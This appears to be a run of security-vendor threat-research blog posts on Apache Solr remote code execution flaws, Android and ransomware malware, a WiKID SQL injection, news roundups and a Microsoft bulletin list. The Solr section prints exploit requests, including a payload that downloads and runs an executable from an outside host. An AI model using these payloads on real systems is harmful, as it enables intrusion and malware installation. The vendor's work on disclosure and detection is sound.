Apache Solr vulnerabilities bound to be attacked

/in /by

What is Apache Solr?

Apache Solr is a fast open-source Java search server. Solr enables you to easily create search engines which searches websites, databases and files. It’s been an industry player for almost a decade, offers real-time indexing, dynamic clustering, load-balanced querying, replication, automated fail-over and recovery. Quite a few internet giants such as Netflix, eBay, Instagram, and Amazon use Solr because of its ability to index and search multiple sites.

Remote Code Execution Vulnerabilities:

CVE-2019-0193:

This vulnerability is due to the ability to remotely configure DataImportHandler via the “/solr//dataimport” URI. When such a request is received, the handleRequestBody() method of DataImportHandler is called, which results in a call to runCmd() with the request parameters as an argument. If the command HTTP parameter is set to full-import, doFullImport() is called which results in a call to DocBuilder.execute() causing the XML data to be evaluated. This XML data may contain components which may result in arbitrary code execution.

Exploit:

Target running a vulnerable version of the Solr software with the DataImportHandler plugin enabled, can be exploited with the below request.

POST /solr/test/dataimport HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referrer: http://XXXX:8983/solr/test/dataimport
User-Agent: Mozilla/4.0
Content-length:
Host: XXXX:8983

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process = jav.lang.Runtime.getRuntime();
process.exec("cm d.exe /c certutil.exe -urlcache -split -f http://fk.0xbdairolkoie.space/download.exe %SymtemRoot%/Temp/qlvgcgsdomyjhfd26554.exe & cm d.exe /c %SymtemRoot%/Temp/qlvgcgsdomyjhfd26554.exe");
return row;
}
]]</script>
</dataConfig>

Mitigation:

Solr versions prior to 8.2.0 are affected by this. Updating to the latest version will resolve the issue.

CVE-2019-12409:

This vulnerbaility is due to insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file. If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.

Exploit:

If ENABLE_REMOTE_JMX_OPTS is set to “true”, attackers can execute malicious code on the server using the below code.

java -jar jython-standalone-2.7.0.jar mjet.py host 18983 install super_secret

Mitigation:
Solr versions 8.1.1 and 8.2.0 for Linux are affected by this.

This issue can be fixed by changing the ENABLE_REMOTE_JMX_OPTS set to ‘false’ on every Solr node and then restart Solr server or by updating Solr to the latest version.
Also recommend blocking inbound traffic on JMX_PORT.


Zero day (CVE not yet assigned):

Apache Solr has a remote command execution vulnerability based on Velocity templates. This vulnerability is due to the injection of Velocity templates. An attacker could use the vulnerability to access the Core name on the Solr server, first set params.resource.loader.enabled to true, then load a resource and execute the command on the server.

Exploit:

Apache-Solr integrates the VelocityResponseWriter plug-in by default. The params.resource.loader.enabled parameter in the plug-in initialization is used to control whether the parameter resource loader is allowed to specify a template in the Solr request parameter. The default setting is false. The attacker can set the parameter params.resource.loader.enabled to true through a POST request. Later sending a crafted GET request code can cause a remote code execution on the Solr server.

The params.resource.loader.enabled option of the VelocityResponseWriter initialization parameter in the Velocity template is turned on with the following POST request.

POST / solr / test / config HTTP / 1.1
Host: solr: 8983
Content-Type: application / json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

Later, attackers load a malicious templates into the Solr template with the following GET request.

GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java. lang.Runtime% 27)) +% 23set ($ chr = $ x.class.forName (% 27java.lang.Character% 27)) +% 23set ($ str = $ x.class.forName (% 27java.lang. String% 27)) +% 23set ($ ex = $ rt.getRuntime (). Exec (% 27id% 27)) + $ ex.waitFor () +% 23set ($ out = $ ex.getInputStream ()) +% 23foreach ($ i + in + [1 .. $ out.available ()]) $ str.valueOf ($ chr.toChars ($ out.read ()))% 23end HTTP / 1.1
Host: XXX:8983

Mitigation:

No fix from the vendor available yet.

Review the VelocityResponseWriter class in the solrconfig.xml configuration file, ensure the params.resource.loader.enabled value is set to false.
Also make sure Config API is locked down, else attacker could modify the solrconfig.xml.

Trend Chart:

At the time of writing this article, we are not aware of attacks exploiting these vulnerabilities in the wild, but we see an increasing scanning activity for port 8983 & 18983 in the recent past. More Widespread attacks on the vulnerable Solr servers could be imminent.

 

Fig: Port activity taken from SANS Internet Storm Center: Port 8983

Fig: Port activity taken from SANS Internet Storm Center: Port 18983

Top IP’s scanning the port 8983:

185.153.197.5
185.153.197.5
51.38.162.236
159.203.201.236
159.203.201.19
51.38.162.236
159.203.201.84
159.203.201.64
211.159.219.162
125.64.94.221
194.61.24.102

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

IPS: 14096 Apache Solr Config API Insecure Deserialization
IPS: 14445 Apache Solr DataImportHandler Remote Code Execution 1
IPS: 14446 Apache Solr DataImportHandler Remote Code Execution 2
IPS: 14599 Apache Solr DataImportHandler Remote Code Execution 3
IPS 14600 Apache Solr Config VelocityResponseWriter
IPS: 13036 Apache Solr Remote Code Execution 1
IPS: 13037 Apache Solr Remote Code Execution 2
IPS: 13287 Apache Solr DataImportHandler Information Disclosure
WAF: 1738 Apache Solr DataImportHandler Remote Code Execution
WAF: 1702 Apache Solr Config API Insecure Deserialization

Ginp Android malware steals sensitive user information

/in /by

SonicWall Threats Research Team observed reports of a new Android malware on the rounds. This malware spies on the infected device and shows custom overlays over applications to steal credentials.

Infection Cycle

Among the permissions requested by the app, few permissions can potentially access sensitive data:

  • Read sms
  • Write sms
  • Send sms
  • Receive sms
  • Request install packages
  • Read contacts
  • System alert window
  • Write external storage
  • Receive boot completed

Upon execution, the malware requests for Accessibility Services. It keeps requesting for this permission until the user grants it:

In the background the malware communicates with the server at 64.44.51.107 which is currently not active. As a result only one-sided communication was observed during our analysis where the malware kept sending messages to the server.

Network Communication

This malware informs the server about the functions it executes via POST messages. The function executed is included as a parameter, following are some examples:

  • When the malware asks for accessibility permissions:

  • The malware is difficult to remove, as it simulates a back button press whenever the user goes to ‘settings’ >’app’. It sends a message to the server whenever the user tries to do so:

 

  • We saw attempts to open a custom overlay screen when we clicked on the Google Play app. Since the server was not active, the actual overlay was not observed getting downloaded.  However we were unable to access Google Play app as the malware kept trying to download the overlay screen.
  • The malware informs the server with a message in the same format stating ‘Starting CC Injection’, indicating it tries to show Credit Card overlay as observed in a number of such overlay malware:

 

  • At one stage a network packet containing all the functions executed during our analysis session was observed:

Garbage Code

Static analysis of this malware is impeded by presence of a large amount of garbage code:

Connected Apps

 

VirusTotal graph shows multiple connected malicious apps that communicate with the same server. These apps have functionality similar to the malicious app being analyzed :

  • sing.guide.false
  • erode.jump.submit
  • solution.rail.forward
  • ethics.unknown.during
  • kgjapmy.lmdouzkomihupljyu.ahotdlfsfejferkznnwpos
  • park.rather.dance

Hard-coded Functions

A number of hard-coded functions are visible in the code which can be triggered via remote commands from the server:

  • killBot
  • setPingDelay
  • getAllSms
  • getAllContacts
  • disableAccessibility
  • enableAccessibility
  • startHiddenSMSActivity
  • stopHiddenSMSActivity
  • enableGrabber
  • disableGrabber
  • enableExtendedInject
  • disableExtendedInject
  • startPermissions
  • saveContacts
  • sendBulkSMS
  • apkUpdate
  • setNewUrl
  • sendInboxMessagesToServer
  • getInboxMessagesData

 

Overall this malware attempts to steal sensitive information from the infected device by displaying overlays.

 

SonicWall Capture Labs provides protection against this threat with the following signature:

  • AndroidOS.Ginp.SV
  • AndroidOS.Ginp.IN

Indicators of Compromise:

  • 155009a186b939f050fcffbed42dcc2c38c953ea2f1b28c12d3d1a67151992a6
  • aa0d20f742fbcd80c950907381f61a3c04f79e83f8c65ddfdfd44f629b28b61e
  • 7eb239cc86e80e6e1866e2b3a132b5af94a13d0d24f92068a6d2e66cfe5c2cea
  • 5ac6901b232c629bc246227b783867a0122f62f9e087ceb86d83d991e92dba2f
  • 1350ee16f82aa56504f33253ed678580e406d18b8f3307715bdfeaa6c06d4008
  • b4af05dac85e6640e684092f56ce455647d3eb29676c2cf52c5f3c751d2f51b4

BAT file based Ransomware targeting people in China

/in /by

The SonicWall Capture Labs Threat Research Team has observed a BAT file related to CXK-NMSL V3.2 Ransomware targeting people in China.

The batch file uses ‘FOR’ looping command for listing the files in the directory. The listed files are renamed with “.cxkdata” suffix.
The renamed files are then base64 encoded using the “certutil –encode” command and saved into new file having .cxk_nmsl as extension, the original files are later deleted.

The Ransomware encodes files found in the following locations:

• %SystemDrive%\
• %UserProFile%\
• %UserProFile%\Desktop\
• %UserProFile%\Downloads\
• %UserProFile%\Favorites\
• %UserProFile%\Searches\
• %UserProFile%\Saved Games\
• %UserProFile%\Contacts\
• %UserProFile%\Links\
• %UserProFile%\Videos\
• %UserProFile%\Pictures\
• %UserProFile%\Documents\
• %UserProFile%\Music\

The batch file contains base64 encoded PE file which is saved into the disk as “X”.

The file “X” is later decoded and saved into the disk using Certutil command as show below:

The PE file tries to load Krnln.fnr Dll and execute the “GetNewSock” API. This API provides capabilities for remote administration.

It also has base64 encoded zip file containing the wallpaper.jpg

Wallpaper.jpg

It creates the .JS file which is used to decode the base64 encoded file (wallpaper.jpg)

It also creates a VBS file which is used to display the message box in Chinese language.

It modifies the registry and sets the values of wallpaper to its own wallpaper.jpg.

And executes the below command which is a preferred method for refreshing the wallpaper without the user being logging off and back on.

The Ransomware note is in Chinese language; which asks the victim to pay 100 B coins as ransom and for more information regarding the B coins it directs user to below site.

https://www.bilibili.com/blackboard/help.htmlprice.

Ransomware note

And at the end it drops the MP3 file and plays the song.

Sonicwall Capture Labs provides protection against this threat with the following signature:

  • GAV: Ransom.BatCXK_NMSL (Trojan)

Indicators of Compromise:

  • 01b575a1012b97988655980a48430dbb

Debug build of Jigsaw Ransomware contains SMTP email credentials

/in /by

The SonicWall Capture Labs Threat Research Team observed reports of a new version of the Jigsaw ransomware.  The version analysed here appears to be an early debug build and sports a new interface, a significant departure from interfaces using clown images in previous versions.  As this is a test version of the malware, no encryption actually takes place.

Infection Cycle:

The malware exeutable file contains the following metadata:

Upon execution it displays the following messagebox:

It brings up the following dialog:

 

The “View encrypted files” button brings up the following page:

 

The following files are added to the system:

  • %APPDATA%\SkinSoft\VisualStyler\2.4.59444.6\x86\ssapihook.dll
  • {run location}\EncryptedFileList.txt
  • {run location}\FileSystemSimulation\NotTxtTest.nottxt
  • {run location}\FileSystemSimulation\TxtTest.txt.die (empty file)
  • {run location}\Newtonsoft.Json.dll
  • {run location}\SkinSoft.VisualStyler.dll

 

NotTxtTest.nottxt contains the following text:

I am NOT a txt test.

 

EncryptedFileList.txt contains the following text:

{run location}\FileSystemSimulation\TxtTest.txt

 

Nothing is actually encrypted on the system.  Presumably, this is because it is a debug version.

 

The malware executable file contains the following string:

  • C:\Users\Moises\Desktop\jigsawransomware2019-master\JigsawRansomware\obj\Debug\JigsawRansomware.pdb

 

The malware makes the following DNS requests:

  • hostas8.cf
  • google-analytics.com
  • ip-api.com
  • osdsoft.com

 

The following network traffic was observed between the malware and the hosts listed above:

 

A further look into the executable file reveals credentials for 1455 SMTP email accounts:

 

The BTC address (3DCMs9XgBi6HDigyPggqhrpMYuwp3d81rM) has some transaction history.  However, it is not certain whether or not the transactions are directly related to ransom payments:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Jigsaw.RSM_26 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

WiKID Enterprise 2FA Server SQL Injection Vulnerability

/in /by

WiKID Enterprise 2FA (two factor authentication) Enterprise Server through 4.2.0-b2047 is vulnerable to SQL injection through the searchDevices.jsp endpoint (CVE-2019-16917)

WiKID Enterprise 2FA
WiKID 2FA (Two-factor Authentication) Enterprise Server is an authentication system which can work with services like RADIUS server, LDAP directory, and AD Domain server to provide two-factor authentication solutions for enterprise environment. It offers several features such as handling two-factor authentication requests and validation, passcode request, user management, certificate management, and administrative preferences.

Sql injection
A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete)

The Vulnerability(CVE-2019-16917)
Sql Injection vulnerability exists in WiKID Enterprise 2FA.It fails to sanitize the uid and domain parameters. The SQL query constructed in the buildSearchWhereClause function.The WiKID Enterprise server provides a graphical user interface to manage administrative monitoring via  “https://<server>/WiKIDAdmin/”

If we look at the buildSearchWhereClause  function of searchDevices.jsp , we see that the id and domain are used directly to construct the sql queries. The id and domain parameters are not sanitized and used directly which makes this function vulnerable to sql injection attacks.

The backend database is postgres which accepts stacked queries.One example of an attack could look like which will cause the database to sleep for 10 seconds.

This Vulnerability is patched. If we compare the patched code vs the vulnerable code we see that the patched version of searchDevices.jsp uses PreparedStatement  to sanitize the uid and domain parameters before forming a sql query . Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker.

SonicWall Capture Labs Threat Research team provides protection against this threat with the following signature: 
IPS 14569 : WiKID Enterprise 2FA SQL Injection
IPS : SQL Injection Attack
SonicWall WAF has been designed to provide protection against this exploit by default.

Cyber Security News & Trends – 11-22-19

/0 Comments/in /by

This week, SonicWall is looking for Beta Testers for the SonicWall Community, Ransomware-as-a-Service is put under the spotlight, and Disney+ accounts are hacked only hours after going live.

SonicWall Spotlight

SonicWall Leads Series a Round Funding in Zero-Trust Security Provider Perimeter 81 – SonicWall Press Release

  • SonicWall has signed a commercial agreement for the development of joint solutions with Perimeter 81. This agreement means that we are able to provide a wide range of businesses, from SMBs to Fortune 500s and governments, with SonicWall’s award-winning Capture Cloud Platform and real-time breach detection and prevention solutions, while also allowing them to adopt a zero-trust security architecture that delivers tremendous efficacy in securing the modern organization.

Call for Beta Testers – The SonicWall Community

  • SonicWall is delighted to announce that it will be launching the SonicWall Community in 2020. The community will be a place where our customers, partners and product experts can collaborate to share knowledge, experiences, resources and opinions. Do register your interest if you are want to be a beta tester for our pilot community.

The CyberWire Daily Podcast – The Cyberwire

  • The CyberWire Daily Podcast rounds up the cybersecurity news each day and SonicWall CEO Bill Conner makes an appearance on Thursday 21st of November, discussing the Q3 threat intelligence data from SonicWall Capture Labs.

Ransomware-as-a-Service: SaaS for Cyber Criminals – SC Magazine (UK)

  • Ransomware’s simplicity and lucrativeness as a form of cyberattack has led to a growth in what is known as Ransomware-as-a-Service – a user-friendly version of ransomware that can easily be deployed with minimal technical knowledge. SonicWall CEO Bill Conner explains how it works, why it is so popular, and how to fight it in SC Magazine.

Cybersecurity News

1.2 Billion Records Found Exposed Online in a Single Server – Wired

  • A researcher has found a database containing over a billion records on an easily accessed, unsecured server. The data does not contain passwords or financial information, but does contain phone numbers, social profiles, and work histories of the huge number of those affected.

Thousands of Hacked Disney+ Accounts Are Already for Sale on Hacking Forums – ZDNet

  • Hackers hijacked Disney+ accounts and put them up for sale within hours of the service launching this week. Prices for the details of account vary from $3 to $11 on online forums, in comparison to a legitimate subscription that costs a user $7 a month.

WhatsApp Remote Code Execution Triggered by Videos – Threat Post

  • A newly discovered vulnerability in WhatsApp was discovered and quietly patched this week. The flaw would allow an attacker to target a user simply by sending them an MP4 file by WhatsApp. There is no evidence that the vulnerability had been exploited in the wild before the patch was sent out.

Attacks on Healthcare Jump 60% in 2019 – so Far – Dark Reading

  • A new report has named the healthcare system as the seventh-most targeted industry by malware, but also an industry that is still dragging its heels when it comes to preparedness, with a large number of legacy hardware and software systems still in use.

Financial Advisors Need to Put Cybersecurity Plans to the Test – CNBC

  • The U.S. Securities and Exchange Commission has released cybersecurity guidance for financial advisory firms. The simple message of this notice is that no firm is too small to have cybersecurity protections in place, and no firm should be so confident in their systems that they do not regularly test them.
And Finally

Influencer Marketing Comes to Cybersecurity – Axios

  • Perhaps it was only a matter of time, but the popular culture world of influencers has finally caught up with the usually more scientific world of cybersecurity. Eagle-eyed watchers of social-media have noticed an uptick in follower-rich cybersecurity Twitter accounts running individualized adverts. Other popular accounts have since come out and denounced accepting payments for adverts as unethical in the world of cybersecurity.

In Case You Missed It

AnteFrigus ransomware actively spreading in the wild

/in /by

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of ANTEFRIGUS ransomware [ANTEFRIGUS.RSM] actively spreading in the wild.

The ANTEFRIGUS ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle:

The ransomware adds the following files to the system:

  • Malware.exe
    • % App.path%\ <Random>-readme.TXT
      • Instruction for recovery
    • %App.path%\ [Name]. <Random>

Once the computer is compromised, the ransomware runs the following commands:

The ransomware encrypts all the files and appends the [<Random>]  extension onto each encrypted file’s filename.

After encrypting all personal documents, the ransomware shows the following text file containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

 

The ransom note contains instructions to an .Onion website in order to decrypt files.

It is a webpage that is located on the TOR network:

We have been monitoring varying hits over the past few days for the signature that blocks this threat:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: ANTEFRIGUS.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cyber Security News & Trends – 11-15-19

/0 Comments/in /by

This week, SonicWall meets a Russian ransomware cell, the first 2020 cyber-predictions are coming in, and cybersecurity has a color.

SonicWall Spotlight

Mindhunter: Meeting a Russian Ransomware Cell – SonicWall Webinar

  • On November 19, SonicWall will proudly present Mindhunter: my two-week conversation with a ransomware cell. Join SonicWall security expert Brook Chelmo as he gives you an inside look into the human-side of a modern ransomware cell, their advice on how to stop them from infiltrating your organization, encrypting your endpoints, and spreading to other drives and segments of your network.

Retail’s Weakness Is Cyber Crime’s Opportunity – Retail Technology Review

  • The festive shopping season is about to kick off with Black Friday 2019. Writing in Retail Technology Review, SonicWall CEO Bill Conner details the size and scale of cyberattacks over the same period last year and offers advice on to retailers on how to best protect themselves.

Attack on Labour Shows Need for DDoS Defence but Should Alarm Few – Computer Weekly (UK)

  • The UK Labour party’s website suffered a DDoS attack this week. While Cloudflare successfully prevented any major damage from occurring, the attack acts as a reminder that modern election campaigns need to ensure that their cybersecurity is prepared for anything. SonicWall’s Terry Greer-King provides commentary.

Cybersecurity News

Predictions 2020: This Time, Cyberattacks Get Personal – ZDNet

  • The first cyber predictions for 2020 have started rolling in. Initial contenders include the weaponizing of mergers and acquisitions data, deepfake scams, and the closing off of AI and Machine Learning data from outsiders.

Breach Affecting 1 Million Was Caught Only After Hacker Maxed out Target’s Storage – Ars Technica

  • A hacker breached an IT provider in May 2014, stealing data and creating a data archive on their server that went unnoticed for almost two years. The hack was only noticed in 2016 when the hackers archive grew so big the server ran out of disk space. The company have now been fined for failing to detect the breach.

Cybersecurity: Why More Needs to Be Done to Help Older People Stay Safe Online – ZDNet

  • Internet users are no longer just the young or most technologically up-to date. ZDNet argues that not enough is being done to protect less tech-savvy elderly people online.

As 5G Rolls out, Troubling New Security Flaws Emerge – Wired

  • 5G is entering use in major urban domains worldwide, and its uptake is likely only to increase rapidly. Despite this, major security vulnerabilities continue to be found, including 11 design flaws in a single recent study.

Cybersecurity Is an Asset, Not a Nuisance – Forbes

  • Forbes argues that a good way to think about cybersecurity is not as a nuisance but like the braking system on a race car. Without it, the potential top speed of the car would be considered reckless.

The Time to Tackle Cybersecurity in Self-Driving Cars is Now – Newsweek

  • Upcoming self-driving cars contain a myriad of computers connected both to each other and to many external networks. With cyberattacks a constant threat to systems worldwide, Newsweek argues that cybersecurity should be integral to the very design of cars from the ground up, not as an add-on at a later point.
And Finally

What Color Is Cybersecurity? – Forbes

  • A new large-scale study into how cybersecurity is talked about and advertised online has found the color code #235594 to be dominant in imagery.

In Case You Missed It

Microsoft Security Bulletin Coverage for November 2019

/in /by

SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of November 2019. A list of issues reported, along with SonicWall coverage information are as follows:

CVE-2018-12207 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-0712 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2019-0719 Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-0721 Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-11135 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1234 Azure Stack Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-1309 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2019-1310 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2019-1324 Windows TCP/IP Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1370 Open Enclave SDK Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1373 Microsoft Exchange Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1374 Windows Error Reporting Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1379 Windows Data Sharing Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1380 Microsoft splwow64 Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1381 Microsoft Windows Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1382 Microsoft ActiveX Installer Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1383 Windows Data Sharing Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1384 Microsoft Windows Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-1385 Windows AppX Deployment Extensions Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1388 Windows Certificate Dialog Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1389 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1390 VBScript Remote Code Execution Vulnerability
IPS 14574:VBScript Remote Code Execution Vulnerability (NOV 19) 1
CVE-2019-1391 Windows Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2019-1392 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1393 Win32k Elevation of Privilege Vulnerability
ASPY 5844:Malformed-File exe.MP.113
CVE-2019-1394 Win32k Elevation of Privilege Vulnerability
ASPY 5844:Malformed-File exe.MP.113
CVE-2019-1395 Win32k Elevation of Privilege Vulnerability
ASPY 5844:Malformed-File exe.MP.113
CVE-2019-1396 Win32k Elevation of Privilege Vulnerability
ASPY 5844:Malformed-File exe.MP.113
CVE-2019-1397 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1398 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1399 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2019-1402 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1405 Windows UPnP Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1406 Jet Database Engine Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1407 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1408 Win32k Elevation of Privilege Vulnerability
ASPY 5844:Malformed-File exe.MP.113
CVE-2019-1409 Windows Remote Procedure Call Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1411 DirectWrite Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1412 OpenType Font Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1413 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-1415 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1416 Windows Subsystem for Linux Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1417 Windows Data Sharing Service Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1418 Windows Modules Installer Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1419 OpenType Font Parsing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1420 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1422 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1423 Windows Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1424 NetLogon Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-1425 Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1426 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2019-1427 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2019-1428 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2019-1429 Scripting Engine Memory Corruption Vulnerability
ASPY 5843:Malformed-File html.MP.82
CVE-2019-1430 Microsoft Windows Media Foundation Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1432 DirectWrite Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1433 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1434 Win32k Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2019-1435 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5839:Malformed-File exe.MP.109
CVE-2019-1436 Win32k Information Disclosure Vulnerability
ASPY 5840:Malformed-File exe.MP.110
CVE-2019-1437 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5841:Malformed-File exe.MP.111
CVE-2019-1438 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 5842:Malformed-File exe.MP.112
CVE-2019-1439 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1440 Win32k Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1441 Win32k Graphics Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1442 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-1443 Microsoft SharePoint Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1445 Microsoft Office Online Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-1446 Microsoft Excel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2019-1447 Microsoft Office Online Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2019-1448 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1449 Microsoft Office ClickToRun Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2019-1456 OpenType Font Parsing Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2019-1457 Microsoft Office Excel Security Feature Bypass
There are no known exploits in the wild.

Meeting a Russian Ransomware Cell

/0 Comments/in , /by

Ransomware is one of the most notorious and effective types of cyberattacks in the last decade. And I had the opportunity to go inside the minds that operate a real-world ransomware cell.

It starts with the young leader — nicknamed “Twig” — of a Russian ransomware cell. After two weeks of chatting through a secure channel, what I found was very interesting.

On social media, some cybersecurity firms like to portray him in black hoodies with leather gloves and a backdrop of matrix-style digits. They namedrop buzzwords like advanced-generation V attacks and other trumped up terms, which could be more fitting for nation-state attacks, but this isn’t the case with most hacking groups.

Carrying out successful ransomware attacks typically only requires a mixture of scripts, common vulnerabilities, brute-force efforts, bad IT policies at target organizations, and generations of frustration between eastern and western politics.

MINDHUNTER

On-Demand Webinar: My Two-Week Conversation with a Ransomware Cell

Join SonicWall security expert Brook Chelmo as he gives you an inside look into the human-side of a modern ransomware cell, their advice on how to stop them from infiltrating your organization, encrypting your endpoints, and spreading to other drives and segments of your network.

WATCH NOW

How does a ransomware attack work?

The number of organizations and verticals targeted each week, including the demands they make on the compromised device(s), are all private. Twig, however, is open to saying that their attack style is generally through spear-fishing and port-scanning for common vulnerabilities.

Twig’s favorite ports are “5900 and 5901 which are open and unpassworded.” Together, these two ports rank as the 19th most scanned port. These ports are used by virtual network computing (VNC) for desktop-sharing and remote-control application for Linux and Windows machines.

Over the years, several vulnerabilities related to these ports have allowed attackers to bypass authentication and gain access to the system. If Twig can get in, then your participation isn’t even required to activate the ransomware script (e.g., enable macros on a malicious Word document received in email). In fact, SonicWall research shows that anywhere between 17% and 20% of all malware attacks come through non-standard ports.

While Twigs scripts are pinging a range of IP addresses for vulnerabilities, he runs a PHP script alongside unnamed services that spam targets to gain remote access to their systems.

HILDACRYPT, for example, uses file extensions that are not normally scanned, such as .vbox, to evade inspection and detection by firewalls or email security services. Once access has been granted, he will log in after-hours and run a batch file through PsExec throughout the entire network to make it “go boom.”

Or, in less dramatic words, to “make Hilda run on the entire network.” It’s the same headache caused by the likes of WannaCry, NotPetya and SamSam ransomware strands, the infamous attack wave from three years ago. Since admins tend to have access to multiple drives — and sometimes read/write ability on endpoints via access manager roles — exploiting them is critical to mission success.

“If Twig can get in, then your participation isn’t even required to activate the ransomware script.”

Once systems are compromised, they don’t exfiltrate the files and sell the data like some do. They just set the demand and wait.

Initially, they asked victims to watch the Hilda series on Netflix (yes, really), join their Discord server for support, then pay the stated ransom amount in bitcoin (a popular way to couch the demand).

What can you do to stop ransomware attacks?

First of all, Twig says to “use proper passwords” for ransomware protection. He said many passwords are either written by the ‘crazy or the lazy.’ Most of them are too simple and are often guessed by his scripts. His favorite story was when he found a password to be two quotation marks. I guess the administrator thought it was too simple to guess. Well, he was wrong and had to pay for it.

Second, he said “write your programs in a real programing language.” He said that real programmers write in C or C++, and that Java or PHP is for the lazy and stupid (an opinion not shared by all professional programmers).

